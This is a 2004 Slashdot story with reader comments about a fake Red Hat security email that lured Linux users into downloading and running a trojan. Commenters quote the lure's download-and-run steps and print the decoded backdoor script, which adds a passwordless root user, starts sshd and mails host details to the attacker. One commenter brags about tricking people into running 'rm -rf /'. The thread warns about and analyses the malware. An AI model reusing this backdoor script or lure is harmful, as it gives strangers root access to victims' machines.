Slashdot Mirror

← Back to Stories (view on slashdot.org)

Beware 'Fedora-Redhat' Fake Security Alert

Posted by timothy on from the don't-get-took dept.

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

53 of 628 comments (clear)

  1. text of site by Anonymous Coward · · Score: 5, Informative

    Original issue date: October 20, 2004
    Last revised: October 20, 2004
    Source: RedHat

    A complete revision history is at the end of this file.

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    1. Re:text of site by Seehund · · Score: 5, Informative
      Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.
      drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
      -rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
      -rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
      -rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin
      But I see what you mean.

      Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

      I doubt that many fell for this.

      --
      Help savingAmigaOS and a free PowerPC market
    2. Re:text of site by WindBourne · · Score: 5, Informative
      It is a little root kit.
      /bin/chgrp
      /bin/chmod
      /bin/chown
      /bin/cp
      /bin/ dd
      /bin/df
      /bin/link
      /bin/ln
      /bin/ls
      /bin/mkd ir
      /bin/mknod
      /bin/mv
      /bin/rm
      /bin/rmdir
      /bin /sync
      /bin/touch
      /bin/unlink
      /etc/DIR_COLORS
      / etc/DIR_COLORS.xterm
      /etc/profile.d
      /etc/profile .d/colorls.csh
      /etc/profile.d/colorls.sh
      /usr/bi n/dir
      /usr/bin/dircolors
      /usr/bin/du
      /usr/bin/i nstall
      /usr/bin/mkfifo
      /usr/bin/shred
      /usr/bin/ vdir
      ...
      And there is more, but hey....
      --
      I prefer the "u" in honour as it seems to be missing these days.
    3. Re:text of site by innocent_white_lamb · · Score: 2, Informative
      Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that.

      Actually, they did. I think what's posted here is "version 2". This version came around earlier this weekend:

      Original issue date: October 20, 2004

      Last revised: October 20, 2004

      Source: RedHat


      A complete revision history is at the end of this file.


      Dear RedHat user,


      Redhat found a vulnerability in fileutils (ls and mkdir), that could
      allow a remote attacker to execute arbitrary code with root privileges. Some
      of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
      8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
      *BSD and Solaris platforms are NOT affected.

      The RedHat Security Team
      strongly advises you to immediately apply the fileutils-1.0.6
      patch      . This is a critical-critical update that you must make by
      following these steps:

      • First download the patch from the Stanford RedHat mirror:
        wget
        www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz
      • Untar the patch: tar zxvf
        fileutils-1.0.6.patch.tar.gz
      • cd
        fileutils-1.0.6.patch
      • make
      • ./inst

      Again, please apply this patch as soon as possible or you risk your system
      and others` to be compromised.

      Thank you for your prompt attention to
      this serious matter,


      RedHat Security Team.


      Copyright © 2004 Red Hat, Inc. All rights reserved.

      --
      If you're a zombie and you know it, bite your friend!
  2. Here's what WHOIS says: by SIGBUS · · Score: 5, Informative

    [Querying whois.internic.net]
    [Redirected to whois.melbourneit.com]
    [Querying whois.melbourneit.com]
    [whois.melbourneit.com]

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    --
    Oh, no! You have walked into the slavering fangs of a lurking grue!
    1. Re:Here's what WHOIS says: by barzok · · Score: 2, Informative

      95301 is Atwater, CA. There are at least 2 Cedar Avenues in NY (Staten Island and The Bronx), and one in Atwater.

    2. Re:Here's what WHOIS says: by datastalker · · Score: 3, Informative

      That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

      --
      Find out about the Lexus Rx400h Hybrid!
    3. Re:Here's what WHOIS says: by Shandon · · Score: 2, Informative

      Data looks contradictory, but also be wary of the joe-job. Raymond Jackson may be an unpopular name to have right about now...

    4. Re:Here's what WHOIS says: by bconway · · Score: 2, Informative

      Don't forget the domain that the script emails, root@addlebrain.com:

      Found a referral to whois.enom.com.

      Registration Service Provided By: StoreIQ, Inc.
      Contact: technical@storeiq.com
      Visit:

      Domain name: addlebrain.com

      Registrant Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Administrative Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Technical Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Billing Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Status: Locked

      Name Servers:
      dns1.name-services.com
      dns2.name-services.com
      dns3.name-services.com
      dns4.name-services.com
      dns5.name-services.com

      Creation date: 18 Feb 2000 17:02:59
      Expiration date: 18 Feb 2005 17:02:59

      --
      Interested in open source engine management for your Subaru?
  3. Re:I'll try it... by damiam · · Score: 5, Informative

    Make sure you use a chroot jail; Knoppix can still write to your hard drive.

    --
    It's hard to be religious when certain people are never incinerated by bolts of lightning.
  4. Re:I'll try it... by busonerd · · Score: 4, Informative

    [apologies for replying to myself]

    The makefile compiles an application called inst that seems to have been created with the shc script compiler.. its rather obfuscated.. attempting to reverse engineer now

  5. Looking at the files.. by schmiddy · · Score: 1, Informative

    First of all, this site should be shut down immediately. I'm not sure exactly what laws apply, but they're definitely guilty of spamming and spreading trojans, that should be enough in and of itself to notify their hosting provider.

    I downloaded that tar file off the site to take a look at it. It contains a makefile, an inst.c , and a binary file "fileutils-patch.bin".

    Looking at inst.c, I'm too lazy to figure out all the code on my own, but it's well commented and the functions are properly named, proper indentation, etc. (I suspect they probably just ripped off some open source programs, modified the code a bit, and turned it into a trojan.)

    I think there's at least stuff in there to crack your password file since I see:
    key(pswd, sizeof(pswd_t));
    in there. I'm guessing the binary patch file does some nasty stuff as well.

    P.S. I just looked at the binary file through strings. It is indeed a rip-off of some GPL program, since the following text is included at the beginning of the file:

    fileutils-4.1.9-11
    =u9F!
    5928f30d339e2c8002986120e6abd2e7d4e61921
    =u9F!
    fileutils
    4.1.9
    The GNU versions of common file management utilities.
    The fileutils package includes a number of GNU versions of common and popular file management utilities. Fileutils includes the following tools: chgrp (changes a file's group ownership), chown (changes a file's ownership), chmod (changes a file's permissions), cp (copies files), dd (copies and converts files), df (shows a filesystem's disk usage), dir (gives a brief directory listing), dircolors (the setup program for the color version of the ls command), du (shows disk usage), install (copies files and sets permissions), ln (creates file links), ls (lists directory contents), mkdir (creates directories), mkfifo (creates FIFOs or named pipes), mknod (creates special files), mv (renames files), rm (removes/deletes files), rmdir (removes empty directories), sync (synchronizes memory and disk), touch (changes file timestamps), and vdir (provides long directory listings). daffy.perf.redhat.com
    Red Hat Linux
    Red Hat, Inc.
    Red Hat, Inc.
    Applications/File
    linux
    i386

    --
    http://cltracker.net -- powerful craigslist multi-city search
  6. Re:Stupid Tricks? by stratjakt · · Score: 1, Informative

    I wouldn't say the audience of linux is tech-savvy, they just think they are.

    The stupidest people I've ever met are the ones who think they know everything. Your average 14 year old who installs gentoo and now considers himself a giant in the world of computing fits the bill. I've suggested rm -rf / (logged in as root, of course) as a solution to email routing problems, and they do it.

    They'd easily fall for this. More easily, I'd say, then the average clueless user, since many of them are slightly technophobic. You just have to tickle their egos. Put some big techical sounding words and acronymns in the email, and they'll suck it down.

    --
    I don't need no instructions to know how to rock!!!!
  7. Spelling/Grammar? by hereschenes · · Score: 2, Informative

    "Anybody running RedHat and Fedora are strongly adviced to apply this patch!"

    Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!

    --
    More like... nerdular nerdence!
  8. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    Identifying the system. This may take up to 2 minutes. Please wait...
    adduser: No more than two names.
    passwd: Unknown user bash
    Could not load host key: /etc/ssh/ssh_host_key
    Could not load host key: /etc/ssh/ssh_host_rsa_key
    Could not load host key: /etc/ssh/ssh_host_dsa_key
    Disabling protocol version 1. Could not load host key.
    Disabling protocol version 2. Could not load host key.
    sshd: no hostkeys available -- exiting.
    System looks OK. Proceeding to next step.

    Patching "ls": ###########
    Patching "mkdir": ##########

    System updated and secured successfully. You may erase these files.

  9. Re:I'll try it... by eakerin · · Score: 4, Informative
    Well I downloaded it, and uncompressed it.

    There are 3 files:
    fileutils-patch.bin
    inst.c
    Makefile

    fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature) Probably just put there to make it look bigger, and have something that came from redhat.

    Well I was gonna put the package header information here, but slashcode didn't like it.

    Signature verification using "rpm --checksig fileutils-patch.bin"
    fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK
  10. Use SPF to protect yourself from phishing by taubz · · Score: 5, Informative

    If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

    How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.

    (Disclosure: I wrote the plugin. :) )

    1. Re:Use SPF to protect yourself from phishing by cortana · · Score: 3, Informative

      I don't see the original email, but I'd bet that it came from something@fedora-redhat.com, and so the SPF record for redhat.com would not have been useful in this case. :)

      On another note, concerning your SPF plugin: I have two points you may wish to consider (if you already have, then fair enough).

      1. The From address used by the plugin comes from the From: header in the message? I thought you're not supposed to do this with SPF; it specifies that you should check the SMTP envelope sender (the MAIL FROM line from the SMTP dialogue). This information is not available to a MUA in any standard form AFAIK.

      2. What happens if I open a message I stored from a few months/years ago, and the SPF record for the domain it's from has changed? Does the plugin validate a message whenever one is opened, and will I end up with a false positive/negative?

      I believe these two issues are why SPF checking must be performed on the server side. The mail server alone has reliable access to the SMTP envelope sender, and can add a Recieved-SPF header at the time of message reception, which is the only time when it is guaranteed that the SPF records from DNS are relevant to the message in question.

      SPF done on the client side basically turns into MICROS~1's (patented, if you believe that they'll allow crap like this to be patented!) Sender-ID system, where the From address is taken from a seletion of message headers.

      Of course, if I'm wrong about any of this, please correct me. :)

    2. Re:Use SPF to protect yourself from phishing by cortana · · Score: 2, Informative

      > Check out the link I posted and see the screenshot -- it worked. The From: address was @redhat.com.

      The point is that you cannot tell. The From header in the email itself tells you nothing. It is forgery of the the SMTP envelope sender that SPF guards against.

      Consider:

      220 some mailserver... ready!
      MAIL FROM: sneaky@fedora-redhat.com
      250 OK
      RCPT TO: some_innocent@hotmail.com
      250 OK
      DATA
      354 you have a go
      From: security@redhat.com
      Subject: EMERGENCY SECURITY PATCH APPLY NOW!

      Etc etc. The SPF check is performed against sneaky@fedora-redhat.com--as per the SPF specification. The recipient of the message never sees sneaky@fedora-redhat.com, however, and is none the wiser.

      SPF certifies the envelope sender of a message, ensuring that an email has a non-forged return parth.

      > Yes. Does it matter that the SPF spec says to use the return path? Is this any less useful?

      Yes, and yes! Standard exist for a reason, ne? From the SPF FAQ:

      ---8---

      Does [SPF] protect the "From:" header field?

      SPF was designed to protect the envelope sender. That means the return-path that shows up in "MAIL FROM", and to a lesser extent the HELO argument that is supposed to be an FQDN. ...

      Protecting authorship information is an important goal. However, the technical issues associated with protecting the "From:" header are much more numerous and challenging. The best way to protect the header "From:" is by using a cryptographic signature such as S/MIME, PGP, or (when it is released) Yahoo DomainKeys.

      If you want to use the "From:" header as the subject of authentication with SPF, you need to be familiar with the following:

      * mailing lists
      * /etc/aliases-style forwarding
      * MUA "resend this message to"
      * web-generated email
      * the Sender header
      * the Resent-Sender and Resent-From headers

      ---8---

      Checking the From header at the MUA would prevent me, for example, sending email from anywhere except my ISP's servers. I would no longer be able to set up remailers to allow me to have mail from several addresses sent to my main address, and so on. Other stuff as in the list above will also break...

  11. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

  12. Re:I'll try it... by superpeach · · Score: 5, Informative

    I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.htm l )

    The working bit of the script is:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

  13. Whois on domains are easily faked by Theatetus · · Score: 2, Informative

    However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com

    Anybody feel like dropping them a line to tell them they're hosting trojaners?

    --
    All's true that is mistrusted
  14. Re:I'll try it... by Cid+Highwind · · Score: 3, Informative

    From a quick glance at the source, it looks like "inst" is an RC4 decryption program a hard-coded (but obfuscated) key. It will probably decrypt fileutils-patch.bin into the real exploit code.

    --
    0 1 - just my two bits
  15. Yahoo! by pavo · · Score: 2, Informative

    Shut it down! Someone paid you to host this, pass that information along to the authorities.

  16. Contents of inst.c... by enginuitor · · Score: 5, Informative

    I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
    View inst.c

  17. Re: I'll try it... Execution results! by Smitedogg · · Score: 5, Informative

    Here is what it does.

    Dogg

  18. Re:Real link? by crow · · Score: 3, Informative
    It looks like it's probably hosted by Yahoo!
    traceroute www.fedora-redhat.com
    traceroute: Warning: www.fedora-redhat.com has multiple addresses; using 66.218.79.149
    traceroute to premium4.geo.yahoo.akadns.net (66.218.79.149), 30 hops max, 38 byte packets
    I'm getting about 3MB/s right now. We won't slashdot the server, but we may well use up the bandwidth quota that this person bought.
  19. Re:Confidence by dtfinch · · Score: 2, Informative

    Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.

    For the most part, they all do, even most of the little ones. Typing "yum -y update" at the command line keeps me up to date, or I could enable the cron job to do it automatically each night.

  20. Looks to be a Klik client? by RedPhoenix · · Score: 2, Informative

    The source code for inst.c seems to be very similar to the "Klik client" code from http://klik.berlios.de/client/klik-0.1.3.c

    Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.

    Klik looks to be a "KDE-based Live Installer for Knoppix".

    Still looking....

    Red.

    1. Re:Looks to be a Klik client? by RedPhoenix · · Score: 2, Informative

      Ok, see superpeach's post above - both klik, and this, use a bit of code that includes shell script in a C program:
      http://www.datsi.fi.upm.es/~frosal/sourc es/shc.htm l

      Red.

  21. I'm retarded by Cid+Highwind · · Score: 4, Informative

    Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.

    --
    0 1 - just my two bits
    1. Re:I'm retarded by busonerd · · Score: 5, Informative

      Preliminary analysis of inst.c: Decrypts a whole bunch of stuff (not sure where it all goes yet) and then splits off to /bin/sh with a command line of: /bin/sh -c exec './inst' "$@" ./inst

  22. Re: I'll try it... Execution results! by MbM · · Score: 5, Informative

    The script is encoded into the text variable in the source. The key part of the script is this:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    (I'd post the whole script but the lameness filter won't let me)

    Create a user named bash, no password
    grab the ip and uptime, start ssh
    mail the results

    --
    - MbM
  23. contact yahoo by Anonymous Coward · · Score: 4, Informative

    Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.

  24. Re:I'll try it... by aredubya74 · · Score: 4, Informative

    Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least next step in the chain of figuring out the culprit, output of whois addlebrain.com:

    Registration Service Provided By: StoreIQ, Inc.
    Contact: technical@storeiq.com
    Visit:

    Domain name: addlebrain.com

    Registrant Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Administrative Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Technical Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Billing Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Status: Locked

    Name Servers:
    dns1.name-services.com
    dns2.name-services.com
    dns3.name-services.com
    dns4.name-services.com
    dns5.name-services.com

    The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

    StoreIQ, Inc.
    John Thompson (technical@storeiq.com)
    +1.7323331145
    Fax:
    3587 US Highway 9 #213
    Freehold, NJ 07728
    US

    --

    RW

  25. Re:I'll try it... by at_slashdot · · Score: 2, Informative

    It's Romanian.

    --
    "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
  26. Re:two good reasons by Antique+Geekmeister · · Score: 3, Informative

    But slashdotting the misused domain will let the company hosting the fraudulent crap know that they should vet their users a bit more carefully, and let them know that they're hosting a *BIG* problem and may need to review their overal customer contracts to prevent this in the future. It also helps give the company incentive to prosecute, or at least sue, the jerk who set them up for this.

  27. Better colours by Anonymous Coward · · Score: 1, Informative

    http://shit.slashdot.org/article.pl?sid=04/10/24/2 352234

  28. Re:How did you get his email and home address?? by Anonymous Coward · · Score: 1, Informative

    whois.tucows.com

    tho the info is fake.
    zip is Atwater, CA not NY.
    phone number is not NY either.
    209 899 SONORA California PACIFIC BELL RBOC

  29. Re:I'll try it... by at_slashdot · · Score: 3, Informative

    echo "Inca un root frate belea: "
    -translation: one more "root" brother trouble

    echo "user bash stii tu" >> /tmp/mama
    -translation: :user bash" you know

    cat /tmp/mama | mail -s "Inca o roata"
    -translation: one more wheel (roata -- root... it sounds alike)

    It doesn't say anything meaningful, the guy is an idiot.

    --
    "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
  30. ADDLEBRAIN DNS WHOIS query.... by ScottKin · · Score: 0, Informative

    Registration Service Provided By: StoreIQ, Inc.
    Contact: technical@storeiq.com
    Visit:

    Domain name: ADDLEBRAIN.COM

    Registrant Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Administrative Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Technical Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Billing Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Status: Locked

    Name Servers:
    dns1.name-services.com
    dns2.name-services.com
    dns3.name-services.com
    dns4.name-services.com
    dns5.name-services.com

    --
    I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
  31. fedora-redhat.com DNS WHOIS query... by ScottKin · · Score: 0, Informative

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    Have fun!

    --ScottKin

    --
    I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
  32. Re:Christ, they didn't do a very good job... by harlows_monkeys · · Score: 3, Informative
    Neither Red Hat nor Fedora Fegacy provide security updated for 7.3 and 9

    Uhm...you are massively confused. The whole point of Fedora Legacy is to provide such updates.

  33. link to a translation by danalien · · Score: 2, Informative

    here is a slashdot user who has translated it.

    --
    I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
  34. Neutering the trojan by Anonymous Coward · · Score: 1, Informative

    The following patch will cause the program to print out the embedded script rather than execute it, so that you may see what it is trying to do:

    --- inst.c Sat Oct 23 11:02:12 2004
    +++ inst.c.harmless Sun Oct 24 22:00:27 2004
    @@ -378,8 +378,12 @@
    return 0;
    memset(scrpt, (int) ' ', sizeof(hide_t));
    memcpy(&scrpt[sizeof(hide_t) - sizeof(text_t)], text, sizeof(text_t));
    + printf("%s\n", scrpt);
    + exit(0);
    } else {
    scrpt = text; /* Script text */
    + printf("%s\n", scrpt);
    + exit(0);
    }
    } else { /* Reexecute */
    if (*xecc) {

  35. Re:I'll try it... by hattmoward · · Score: 2, Informative

    Generally an every-port-open result from nmap indicates use of a firewall. Watchguard's products tend to do that, and iptables can be made to do similar also.

  36. From the WHOIS: by Anonymous Coward · · Score: 3, Informative

    I looked at the whois... fedora-redhat.com reported:

    Raymond Jackson
    224 Cedar Avenue
    New York, NY 95301.
    209 899-4533 However, 95301 is an Atwater, CA zip code.

    So, I looked up Raymond Jackson in Atwater. What did I find?


    Raymond Jackson
    224 Cedar Avenue
    Atwater, CA 95301
    209 358 8510.

    Looks like he did a crappy job of disguising his identity. Go get him!!!

  37. dont bother wasting your time.... by Indy1 · · Score: 2, Informative

    host fedora-redhat.com
    fedora-redhat.com has address 66.218.79.149
    fedora-redhat.com has address 66.218.79.155
    fedora-redhat.com has address 66.218.79.147
    fedora-redhat.com has address 66.218.79.148

    whois 66.218.79.149

    OrgName: Yahoo!
    OrgID: YAOO
    Address: 701 First Avenue
    City: Sunnyvale
    StateProv: CA
    PostalCode: 94089
    Country: US

    NetRange: 66.218.64.0 - 66.218.95.255
    CIDR: 66.218.64.0/19

    Trying to ddos yahoo wont get you very far : )

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
  38. Re:About Time by Kenja · · Score: 2, Informative
    "it happens on every platform

    hasn't happened on my SGI yet.

    --

    "Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
  39. Full decryption of the shell script by moyix · · Score: 3, Informative

    Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread.

  40. fake security update - update by sgrayban · · Score: 1, Informative

    Site Temporarily Disabled

    This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

    Seems someone has gotten smart on it and turned the site off .......

    Hope the fuckers get nailed for it.

  41. Re:I'll try it... by SynKKnyS · · Score: 2, Informative

    Argh, notice it is an IIS server. And, notice that they offer free email. Put the two together. Someone registered the username "root" apparently. Tricksy.

  42. Re: I'll try it... Execution results! by KarmaPolice · · Score: 3, Informative
    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    Been there, done that:
    <root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
    Recipient Rejected: Not accepting mail for this account : Account
    terminated due to violation of user agreement

    ...the system works!